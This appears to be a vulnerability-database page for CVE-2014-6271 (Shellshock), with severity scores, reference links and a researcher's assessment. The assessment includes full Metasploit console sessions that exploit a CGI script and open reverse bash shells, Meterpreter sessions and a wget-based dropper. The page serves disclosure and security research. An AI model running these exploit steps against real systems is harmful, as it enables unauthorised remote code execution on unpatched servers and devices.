9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.976 High
EPSS
Percentile
100.0%
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Recent assessments:
h00die-gr3y at May 21, 2023 3:28pm UTC reported:
An Golden Oldie
from 2014 that is still very relevant nowadays.
In my recent research of security vulnerabilities, I bumped into several targets that were still vulnerable to CVE-2014-6271 a.k.a. Shellshock
and CVE-2014-6278. You should not be surprised that most of these targets are IoT based with an embedded Linux/Unix image running a vulnerable bash
version. They typically do not get updated at all and are easy targets for a malicious actor to find an entry point into the network.
Metasploit modules like exploit/multi/http/apache_mod_cgi_bash_env_exec
, are pretty restricted to launch an attack due to the limited platform support (only x86) and payloads that can be leveraged in an attack. This brought me to rewrite this module a bit so that it would support multiple platforms (ARM, x86, x64, MIPS) and multiple payloads such as Unix command
and Linux Dropper
. The module name is multi/http/bash_env_cgi_rce
.
To test the module locally, you download a vulnerable bash
version from <https://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz>. Any version published before September 2014 is okay. Just extract it in a local directory and compile it with ./configure && make
.
Configure an Apache
or any other preferred web server to support CGI
scripts. You can find tons of instructions on the web how to do that.
Just create a script like below using the vulnerable bash
version and add this to the cgi-bin
directory of your preferred web server.
#!/bin/bash_CVE_2014_6271
echo "Content-type: text/plain"
echo
echo
echo "Hello World"
Download module from here and follow the install instructions.
Start msfconsole
and play around with the different options and payloads.
msf6 > use exploits/multi/http/bash_env_cgi_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bash_env_cgi_rce) > options
Module options (exploit/multi/http/bash_env_cgi_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
CVE Automatic yes CVE to check/exploit (Accepted: Automatic, CVE-2014-62
71, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
PAYLOADSIZE 2048 yes Payload size used by the CmdStager
Proxies no A proxy chain of format type:host:port[,type:host:port
][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/do
cs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
TARGETURI yes Path to CGI script
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This mus
t be an address on the local machine or 0.0.0.0 to listen
on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix Command
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/bash_env_cgi_rce) > set rhosts 192.168.201.10
rhosts => 192.168.201.10
msf6 exploit(multi/http/bash_env_cgi_rce) > set targeturi /cgi-bin/test.cgi
targeturi => /cgi-bin/test.cgi
msf6 exploit(multi/http/bash_env_cgi_rce) > check
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] 192.168.201.10:80 - The target is vulnerable.
msf6 exploit(multi/http/bash_env_cgi_rce) > set lhost 192.168.201.10
lhost => 192.168.201.10
msf6 exploit(multi/http/bash_env_cgi_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash using vulnerability CVE-2014-6271.
[*] Command shell session 1 opened (192.168.201.10:4444 -> 192.168.201.10:35766) at 2023-05-21 15:01:17 +0000
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
Python Meterpreter payload example
msf6 exploit(multi/http/bash_env_cgi_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp using vulnerability CVE-2014-6271.
[*] Sending stage (24772 bytes) to 192.168.201.10
[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.10:35678) at 2023-05-21 15:03:48 +0000
meterpreter > sysinfo
Computer : cerberus
OS : Linux 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03)
Architecture : aarch64
Meterpreter : python/linux
meterpreter > getuid
Server username: www-data
meterpreter >
Linux File dropper using payload: linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > set target 1
target => 1
msf6 exploit(multi/http/bash_env_cgi_rce) > set payload linux/aarch64/meterpreter_reverse_tcp
payload => linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > set CMDSTAGER::FLAVOR wget
CMDSTAGER::FLAVOR => wget
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp using vulnerability CVE-2014-6271.
[*] Using URL: http://192.168.201.10:8080/ZzirBKe
[*] Client 192.168.201.10 (Wget/1.21.3) requested /ZzirBKe
[*] Sending payload to 192.168.201.10 (Wget/1.21.3)
[*] Meterpreter session 3 opened (192.168.201.10:4444 -> 192.168.201.10:34346) at 2023-05-21 15:10:11 +0000
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.168.201.10
OS : Debian (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple : aarch64-linux-musl
Meterpreter : aarch64/linux
meterpreter > getuid
Server username: www-data
meterpreter >
If you use CMDSTAGER::FLAVOR
option bourne
or printf
, please ensure that your payload size is 2048 or below.
You can control this with the option PAYLOADSIZE
Have fun !!!
Metasploit module multi/http/bash_env_cgi_rce
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5
advisories.mageia.org/MGASA-2014-0388.html
archives.neohapsis.com/archives/bugtraq/2014-10/0101.html
jvn.jp/en/jp/JVN55667175/index.html
jvndb.jvn.jp/jvndb/JVNDB-2014-000126
kb.juniper.net/InfoCenter/index?page=content&id=JSA10673
lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html
linux.oracle.com/errata/ELSA-2014-1293.html
linux.oracle.com/errata/ELSA-2014-1294.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00028.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00029.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00034.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00037.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00040.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00044.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00049.html
lists.opensuse.org/opensuse-security-announce/2014-10/msg00004.html
lists.opensuse.org/opensuse-updates/2014-10/msg00023.html
lists.opensuse.org/opensuse-updates/2014-10/msg00025.html
marc.info/?l=bugtraq&m=141216207813411&w=2
marc.info/?l=bugtraq&m=141216668515282&w=2
marc.info/?l=bugtraq&m=141235957116749&w=2
marc.info/?l=bugtraq&m=141319209015420&w=2
marc.info/?l=bugtraq&m=141330425327438&w=2
marc.info/?l=bugtraq&m=141330468527613&w=2
marc.info/?l=bugtraq&m=141345648114150&w=2
marc.info/?l=bugtraq&m=141383026420882&w=2
marc.info/?l=bugtraq&m=141383081521087&w=2
marc.info/?l=bugtraq&m=141383138121313&w=2
marc.info/?l=bugtraq&m=141383196021590&w=2
marc.info/?l=bugtraq&m=141383244821813&w=2
marc.info/?l=bugtraq&m=141383304022067&w=2
marc.info/?l=bugtraq&m=141383353622268&w=2
marc.info/?l=bugtraq&m=141383465822787&w=2
marc.info/?l=bugtraq&m=141450491804793&w=2
marc.info/?l=bugtraq&m=141576728022234&w=2
marc.info/?l=bugtraq&m=141577137423233&w=2
marc.info/?l=bugtraq&m=141577241923505&w=2
marc.info/?l=bugtraq&m=141577297623641&w=2
marc.info/?l=bugtraq&m=141585637922673&w=2
marc.info/?l=bugtraq&m=141694386919794&w=2
marc.info/?l=bugtraq&m=141879528318582&w=2
marc.info/?l=bugtraq&m=142113462216480&w=2
marc.info/?l=bugtraq&m=142118135300698&w=2
marc.info/?l=bugtraq&m=142358026505815&w=2
marc.info/?l=bugtraq&m=142358078406056&w=2
marc.info/?l=bugtraq&m=142546741516006&w=2
marc.info/?l=bugtraq&m=142719845423222&w=2
marc.info/?l=bugtraq&m=142721162228379&w=2
marc.info/?l=bugtraq&m=142805027510172&w=2
marc.info?l=bugtraq&m=141216207813411&w=2
marc.info?l=bugtraq&m=141216668515282&w=2
marc.info?l=bugtraq&m=141235957116749&w=2
marc.info?l=bugtraq&m=141319209015420&w=2
marc.info?l=bugtraq&m=141330425327438&w=2
marc.info?l=bugtraq&m=141330468527613&w=2
marc.info?l=bugtraq&m=141345648114150&w=2
marc.info?l=bugtraq&m=141383026420882&w=2
marc.info?l=bugtraq&m=141383081521087&w=2
marc.info?l=bugtraq&m=141383138121313&w=2
marc.info?l=bugtraq&m=141383196021590&w=2
marc.info?l=bugtraq&m=141383244821813&w=2
marc.info?l=bugtraq&m=141383304022067&w=2
marc.info?l=bugtraq&m=141383353622268&w=2
marc.info?l=bugtraq&m=141383465822787&w=2
marc.info?l=bugtraq&m=141450491804793&w=2
marc.info?l=bugtraq&m=141576728022234&w=2
marc.info?l=bugtraq&m=141577137423233&w=2
marc.info?l=bugtraq&m=141577241923505&w=2
marc.info?l=bugtraq&m=141577297623641&w=2
marc.info?l=bugtraq&m=141585637922673&w=2
marc.info?l=bugtraq&m=141694386919794&w=2
marc.info?l=bugtraq&m=141879528318582&w=2
marc.info?l=bugtraq&m=142113462216480&w=2
marc.info?l=bugtraq&m=142118135300698&w=2
marc.info?l=bugtraq&m=142358026505815&w=2
marc.info?l=bugtraq&m=142358078406056&w=2
marc.info?l=bugtraq&m=142546741516006&w=2
marc.info?l=bugtraq&m=142719845423222&w=2
marc.info?l=bugtraq&m=142721162228379&w=2
marc.info?l=bugtraq&m=142805027510172&w=2
packetstormsecurity.com/files/128517/VMware-Security-Advisory-2014-0010.html
packetstormsecurity.com/files/128567/CA-Technologies-GNU-Bash-Shellshock.html
packetstormsecurity.com/files/128573/Apache-mod_cgi-Remote-Command-Execution.html
packetstormsecurity.com/files/137376/IPFire-Bash-Environment-Variable-Injection-Shellshock.html
packetstormsecurity.com/files/161107/SonicWall-SSL-VPN-Shellshock-Remote-Code-Execution.html
rhn.redhat.com/errata/RHSA-2014-1293.html
rhn.redhat.com/errata/RHSA-2014-1294.html
rhn.redhat.com/errata/RHSA-2014-1295.html
rhn.redhat.com/errata/RHSA-2014-1354.html
seclists.org/fulldisclosure/2014/Oct/0
secunia.com/advisories/58200
secunia.com/advisories/59272
secunia.com/advisories/59737
secunia.com/advisories/59907
secunia.com/advisories/60024
secunia.com/advisories/60034
secunia.com/advisories/60044
secunia.com/advisories/60055
secunia.com/advisories/60063
secunia.com/advisories/60193
secunia.com/advisories/60325
secunia.com/advisories/60433
secunia.com/advisories/60947
secunia.com/advisories/61065
secunia.com/advisories/61128
secunia.com/advisories/61129
secunia.com/advisories/61188
secunia.com/advisories/61283
secunia.com/advisories/61287
secunia.com/advisories/61291
secunia.com/advisories/61312
secunia.com/advisories/61313
secunia.com/advisories/61328
secunia.com/advisories/61442
secunia.com/advisories/61471
secunia.com/advisories/61485
secunia.com/advisories/61503
secunia.com/advisories/61542
secunia.com/advisories/61547
secunia.com/advisories/61550
secunia.com/advisories/61552
secunia.com/advisories/61565
secunia.com/advisories/61603
secunia.com/advisories/61633
secunia.com/advisories/61641
secunia.com/advisories/61643
secunia.com/advisories/61654
secunia.com/advisories/61676
secunia.com/advisories/61700
secunia.com/advisories/61703
secunia.com/advisories/61711
secunia.com/advisories/61715
secunia.com/advisories/61780
secunia.com/advisories/61816
secunia.com/advisories/61855
secunia.com/advisories/61857
secunia.com/advisories/61873
secunia.com/advisories/62228
secunia.com/advisories/62312
secunia.com/advisories/62343
support.apple.com/kb/HT6495
support.novell.com/security/cve/CVE-2014-6271.html
tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
www-01.ibm.com/support/docview.wss?uid=isg3T1021272
www-01.ibm.com/support/docview.wss?uid=isg3T1021279
www-01.ibm.com/support/docview.wss?uid=isg3T1021361
www-01.ibm.com/support/docview.wss?uid=ssg1S1004879
www-01.ibm.com/support/docview.wss?uid=ssg1S1004897
www-01.ibm.com/support/docview.wss?uid=ssg1S1004898
www-01.ibm.com/support/docview.wss?uid=ssg1S1004915
www-01.ibm.com/support/docview.wss?uid=swg21685541
www-01.ibm.com/support/docview.wss?uid=swg21685604
www-01.ibm.com/support/docview.wss?uid=swg21685733
www-01.ibm.com/support/docview.wss?uid=swg21685749
www-01.ibm.com/support/docview.wss?uid=swg21685914
www-01.ibm.com/support/docview.wss?uid=swg21686084
www-01.ibm.com/support/docview.wss?uid=swg21686131
www-01.ibm.com/support/docview.wss?uid=swg21686246
www-01.ibm.com/support/docview.wss?uid=swg21686445
www-01.ibm.com/support/docview.wss?uid=swg21686447
www-01.ibm.com/support/docview.wss?uid=swg21686479
www-01.ibm.com/support/docview.wss?uid=swg21686494
www-01.ibm.com/support/docview.wss?uid=swg21687079
www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5096315
www.debian.org/security/2014/dsa-3032
www.kb.cert.org/vuls/id/252743
www.mandriva.com/security/advisories?name=MDVSA-2015:164
www.novell.com/support/kb/doc.php?id=7015701
www.novell.com/support/kb/doc.php?id=7015721
www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html
www.qnap.com/i/en/support/con_show.php?cid=61
www.securityfocus.com/archive/1/533593/100/0/threaded
www.securityfocus.com/bid/70103
www.ubuntu.com/usn/USN-2362-1
www.us-cert.gov/ncas/alerts/TA14-268A
www.vmware.com/security/advisories/VMSA-2014-0010.html
www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0
access.redhat.com/articles/1200223
access.redhat.com/node/1200223
bugzilla.redhat.com/show_bug.cgi?id=1141597
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
help.ecostruxureit.com/display/public/UADCO8x/StruxureWare+Data+Center+Operation+Software+Vulnerability+Fixes
kb.bluecoat.com/index?page=content&id=SA82
kb.juniper.net/InfoCenter/index?page=content&id=JSA10648
kc.mcafee.com/corporate/index?page=content&id=SB10085
securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack
securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
support.apple.com/kb/HT6535
support.citrix.com/article/CTX200217
support.citrix.com/article/CTX200223
support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html
support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-c04497075
support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-c04518183
supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673&src=securityAlerts
www.arista.com/en/support/advisories-notices/security-advisories/1008-security-advisory-0006
www.exploit-db.com/exploits/34879
www.exploit-db.com/exploits/34879/
www.exploit-db.com/exploits/37816
www.exploit-db.com/exploits/37816/
www.exploit-db.com/exploits/38849
www.exploit-db.com/exploits/38849/
www.exploit-db.com/exploits/39918
www.exploit-db.com/exploits/39918/
www.exploit-db.com/exploits/40619
www.exploit-db.com/exploits/40619/
www.exploit-db.com/exploits/40938
www.exploit-db.com/exploits/40938/
www.exploit-db.com/exploits/42938
www.exploit-db.com/exploits/42938/
www.suse.com/support/shellshock
www.suse.com/support/shellshock/
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.976 High
EPSS
Percentile
100.0%